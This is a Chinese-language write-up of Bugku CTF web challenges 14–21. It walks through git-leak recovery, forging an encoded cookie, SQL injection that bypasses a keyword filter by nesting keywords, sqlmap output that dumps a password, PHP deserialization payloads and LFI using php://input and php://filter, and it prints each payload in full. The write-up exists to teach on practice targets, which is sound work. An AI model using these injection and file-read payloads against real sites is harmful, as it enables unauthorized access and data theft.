CTF論劍場 Web14-21 WriteUp

  • 2019 年 10 月 8 日
  • 筆記

web14 GitHack

hint:聽說備份了不少東西呢

根據hint信息可以猜測為 /.git/敏感文件泄露,該目錄下包含了所有 git 正常工作所需要的信息。 使用 GitHack工具(項目地址:https://github.com/lijiejie/GitHack)進行探測:

web15 vim

hint: vim編輯器

嘗試提交 id參數為swp,回顯:不是這裡不是這裡不是這裡!!!

注意到此時的鏈接為 /1ndex.php?id=swp&submit=提交查詢#,嘗試修改1i並提交訪問,得到flag{Iswh1teooo000oo0}。

web16 江湖

學會如來神掌應該就能打敗他了吧

進入江湖:

點擊刷新屬性會刷新各屬性的值,動態變化,點擊確定進入:

  • 屬性中提示:每次練功和賺錢都會消耗5秒的時間,請您耐心等待。
  • 每次練功會增加一定的屬性提升,耗時5s一次。
  • 商店中提示:必須將血量、內力、力道、定力修鍊到滿才可以學習如來神掌。
  • 點擊賺錢每次會增加100銀兩的收入。

結合學會如來神掌應該就能打敗他了吧,推測思路為學會如來神掌後討伐魔頭,因此我們需要通過提升各屬性值為滿且從商店購買如來神掌

方案:擁有足夠的銀兩即可提升屬性值為滿且學習如來神掌。

F12查看頁面源代碼發現有以下 js腳本文件:

另外Cookie如下:

下載script.js審計,這裡使用VSCode進行查看(Windows下Shift + Alt + F進行代碼格式化整理):

eval(function (p, a, c, k, e, r) {      e = function (c) { return (c < 62 ? '' : e(parseInt(c / 62))) + ((c = c % 62) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) };      if ('0'.replace(0, e) == 0) {          while (c--) r[e(c)] = k[c];          k = [function (e) { return r[e] || e }];          e = function () {              return '[57-9abd-hj-zAB]'          };          c = 1      };      while (c--) if (k[c]) p = p.replace(new RegExp('\b' + e(c) + '\b', 'g'), k[c]); return p  }('7 s(t){5 m=t+"=";5 8=9.cookie.n(';');o(5 i=0;i<8.d;i++){5 c=8[i].trim();u(c.v(m)==0)p c.substring(m.d,c.d)}p""}7 w(a){5 x=new Base64();5 q=x.decode(a);5 r="";o(i=0;i<q.d;i++){5 b=q[i].charCodeAt();b=b^i;b=b-((i%10)+2);r+=String.fromCharCode(b)}p r}7 ertqwe(){5 y="user";5 a=s(y);a=decodeURIComponent(a);5 z=w(a);5 8=z.n(';');5 e="";o(i=0;i<8.d;i++){u(-1<8[i].v("A")){e=8[i+1].n(":")[2]}}e=e.B('"',"").B('"',"");9.write('<img id="f-1" g="h/1-1.k">');j(7(){9.l("f-1").g="h/1-2.k"},1000);j(7(){9.l("f-1").g="h/1-3.k"},2000);j(7(){9.l("f-1").g="h/1-4.k"},3000);j(7(){9.l("f-1").g="h/6.png"},4000);j(7(){alert("你使用如來神掌打敗了蒙老魔,但不知道是真身還是假身,提交試一下吧!A{"+md5(e)+"}")},5000)}', [], 38, '|||||var||function|ca|document|temp|num||length|key|attack|src|image||setTimeout|jpg|getElementById|name|split|for|return|result|result3|getCookie|cname|if|indexOf|decode_create|base|temp_name|mingwen|flag|replace'.split('|'), 0, {}))

發現代碼進行了 packer打包,直接在線解混後淆得到:

function getCookie(cname) {      var name = cname + "=";      var ca = document.cookie.split(';');      for (var i = 0; i < ca.length; i++) {          var c = ca[i].trim();          if (c.indexOf(name) == 0) return c.substring(name.length, c.length)      }      return ""  }    function decode_create(temp) {      var base = new Base64();      var result = base.decode(temp);      var result3 = "";      for (i = 0; i < result.length; i++) {          var num = result[i].charCodeAt();          num = num ^ i;          num = num - ((i % 10) + 2);          result3 += String.fromCharCode(num)      }      return result3  }    function ertqwe() {      var temp_name = "user";      var temp = getCookie(temp_name);      temp = decodeURIComponent(temp);      var mingwen = decode_create(temp);      var ca = mingwen.split(';');      var key = "";      for (i = 0; i < ca.length; i++) {          if (-1 < ca[i].indexOf("flag")) {              key = ca[i + 1].split(":")[2]          }      }      key = key.replace('"', "").replace('"', "");      document.write('<img id="attack-1" src="image/1-1.jpg">');      setTimeout(function() {          document.getElementById("attack-1").src = "image/1-2.jpg"      }, 1000);      setTimeout(function() {          document.getElementById("attack-1").src = "image/1-3.jpg"      }, 2000);      setTimeout(function() {          document.getElementById("attack-1").src = "image/1-4.jpg"      }, 3000);      setTimeout(function() {          document.getElementById("attack-1").src = "image/6.png"      }, 4000);      setTimeout(function() {          alert("你使用如來神掌打敗了蒙老魔,但不知道是真身還是假身,提交試一下吧!flag{" + md5(key) + "}")      }, 5000)  }

控制台執行如下命令:

嘗試修改各屬性值money為1000000並加密,PHP腳本如下(這裡感謝淚笑師傅的指導~自寫的python腳本存在一些問題結果不一致~):

<?php  function encode($payload) {      $result = '';      for($i = 0; $i < strlen($payload); $i++) {          $b = ord($payload[$i]);          $b = $b + (($i % 10) + 2);          $b = $b ^ $i;          $result = $result.chr($b);      }      return $result;  }    $payload = 'O:5:"human":10:{s:8:"xueliang";i:12;s:5:"neili";i:856;s:5:"lidao";i:83;s:6:"dingli";i:92;s:7:"waigong";i:0;s:7:"neigong";i:0;s:7:"jingyan";i:0;s:6:"yelian";i:0;s:5:"money";i:1000000;s:4:"flag";s:1:"1";}';    echo base64_encode(encode($payload));    //UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeFxphX2YZYgxYQ0VeXQRrQ3QICw51T3YFehZMV1pbS2gDMwAGe3sxdnIKYiA/Nj0+PXQTOxQXbB0nZmFieiM3EREbGg1AWQkoXikXKC9SSgIbHR0DAgdaRRVETj0HPD/ErO7v9un57/6iz/+wvrH30KzQuBfl+Pv96rLZ7d6k2dWcm5yM0dHQxy2OlcGSmZiIiIiIhovBiIL4kNTK0dea/7mC+4bu/er1SQ==  //encodeURIComponent->UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeFxphX2YZYgxYQ0VeXQRrQ3QICw51T3YFehZMV1pbS2gDMwAGe3sxdnIKYiA%2FNj0%2BPXQTOxQXbB0nZmFieiM3EREbGg1AWQkoXikXKC9SSgIbHR0DAgdaRRVETj0HPD%2FErO7v9un57%2F6iz%2F%2BwvrH30KzQuBfl%2BPv96rLZ7d6k2dWcm5yM0dHQxy2OlcGSmZiIiIiIhovBiIL4kNTK0dea%2F7mC%2B4bu%2Fer1SQ%3D%3D  ?>

將修改後的cookie字段發包:

提升屬性和學習如來神掌後討伐老魔獲取flag:

另外在 /wulin.php下發現了出題人留下的彩蛋,可以檢測flag的正確性:

web17 流量分析

直接使用Wireshark打開bugku.pcapng進行TCP流追蹤即可找到flag。

web18 Sql injection

試探過程如下:

?id=1'  回顯空白 -> 可能為單引號閉合  ?id=1'--+ 回顯正常 -> 單引號閉合方式  ?id=1' and 1=1--+ 回顯空白 -> 可能過濾了and  ?id=1' And 1=1--+ 回顯空白 -> 可能過濾了大小寫  ?id=1' anandd 1=1--+ 回顯正常 -> 嵌套剝離繞過 過濾了and、or  ?id=1' oorrder by 3--+ ->列數為3

爆數據庫:

?id=-1' uniunionon selselectect 1,group_concat(schema_name),3 from infoorrmation_schema.schemata--+

得到:information_schema,web18.

爆表:

?id=-1' uniunionon selselectect 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='web18'--+

得到: ctf,flag.

爆列:

?id=-1' uniunionon selselectect 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='flag'--+

得到:id,flag.

爆字段:

?id=-1' uniunionon selselectect 1,flag,3 from flag--+

獲取flag{22b7a7c3d73d88050722b3eeb102ee45} .

web19 Poc And Exp's Love Note

dirsearch探測下發現存在 /.git/泄露:

Githack操作一下,在flag.txt中獲取Hint 1: flag is in /eXpl0ve5p0cVeRymuCh。

sqlmap跑一下,發現存在基於時間的布爾盲註:

---  Parameter: username (POST)      Type: AND/OR time-based blind      Title: MySQL >= 5.0.12 AND time-based blind      Payload: username=admin' AND SLEEP(5) AND 'JKEb'='JKEb&password=123      Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])  ---

繼續獲取信息:

available databases [2]:  [*] information_schema  [*] web19  In Database: web19  [2 tables]  +--------+  | user   |  | hlnt_2 |  +--------+  Database: web19  Table: user  [1 entry]  +----+----------+----------------+  | id | username | password       |  +----+----------+----------------+  | 1  | admin    | p0CLOvesExpT00 |  +----+----------+----------------+  Database: web19  Table: hlnt_2  [1 entry]  +----+-----------------------------------------------+  | id | hInt                                          |  +----+-----------------------------------------------+  | 1  | a class for you "https://postimg.cc/6274vCP5" |  +----+-----------------------------------------------+

用獲取到的username和password登錄admin賬戶:

查看頁面源代碼發現有注釋掉的內容:

結合遊記內容推測可能為snow HTML隱寫(可以在ASCII文本的末行隱藏數據,並且可以通過插入製表位和空格使嵌入的數據在瀏覽器中不可見),使用BurpSuite抓取該頁面內容保存至1.html(嘗試從Firefox保存分析存在問題,感謝冷暗雨師傅指導~).

C:UserslightDesktop>SNOW.EXE -C -p ILOveExp 1.html  flag in /PPPPOOO0CCCC.php

結合在hlnt_2表中獲取的Hint2: aclassforyou"https://postimg.cc/6274vCP5"

Payload:

<?php  class ReadFile {      public $file;  }    $payload = new ReadFile();  $payload->file = '../../PPPPOOO0CCCC.php';  echo serialize($payload);    //O:8:"ReadFile":1:{s:4:"file";s:22:"../../PPPPOOO0CCCC.php";}  //encodeURIComponent  //O%3A8%3A%22ReadFile%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A22%3A%22..%2F..%2FPPPPOOO0CCCC.php%22%3B%7D

web20 GET_key

你的動態密文是:fb49037b2bb5315bdad5228d7cf0c34e2 GET提交對應的密文可以得到flag(forminputname='key') 輸出格式:'flag{….}'

Python腳本:

import re  import requests    url = 'http://123.206.31.85:10020/'  r = requests.session()  text = r.get(url).text  key = re.findall(r'[0-9a-z]+', text)[0]  url2 = url + '?key=' + key  text2 = r.get(url2).text  print(text2)

多試幾次,正確提交後有一定幾率會獲取flag{Md5tiMe8888882019}~

web21 LFI

打開網頁顯示:

you are not admin !

F12查看發現注釋掉的PHP代碼:

$user = $_GET["user"];  $file = $_GET["file"];  $pass = $_GET["pass"];    if(isset($user)&&(file_get_contents($user,'r')==="admin")){      echo "hello admin!<br>";      include($file); //class.php  }else{      echo "you are not admin ! ";  }

看到 file_get_contents()函數推測可能存在文件包含(參看LFI(Local File Include)漏洞學習),利用姿勢如下:

  • 利用 php://input和POST發包 admin繞過filegetcontents($user,'r')==="admin")。
  • 利用 php://filter/read=convert.base64-encode/resource=class.php來讀取class.php。
/index.php?user=php://input&file=php://filter/read=convert.base64-encode/resource=class.php

得到回顯:

hello admin!  PD9waHANCmVycm9yX3JlcG9ydGluZyhFX0FMTCAmIH5FX05PVElDRSk7DQogDQpjbGFzcyBSZWFkey8vZjFhOS5waHANCiAgICBwdWJsaWMgJGZpbGU7DQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9TdHJpbmcoKXsNCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsNCiAgICAgICAgICAgIGVjaG8gZmlsZV9nZXRfY29udGVudHMoJHRoaXMtPmZpbGUpOyAgICANCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4gIl9fdG9TdHJpbmcgd2FzIGNhbGxlZCEiOw0KICAgIH0NCn0NCj8+

解Base64得到class.php:

<?php  error_reporting(E_ALL & ~E_NOTICE);    class Read{//f1a9.php      public $file;      public function __toString(){          if(isset($this->file)){              echo file_get_contents($this->file);          }          return "__toString was called!";      }  }  ?>

注意到 __toString()函數執行時會讀取並打印 $this->file的內容,構造序列化腳本:

<?php  class Read{      public $file;  }    $payload = new Read();  $payload->file = 'f1a9.php';  echo serialize($payload);  //O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}

賦值給 pass,當作為字符串是將調用__toString()讀取f1a9.php的內容,Payload:

/index.php?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}

VirMach 便宜 VPS

QNews

QNews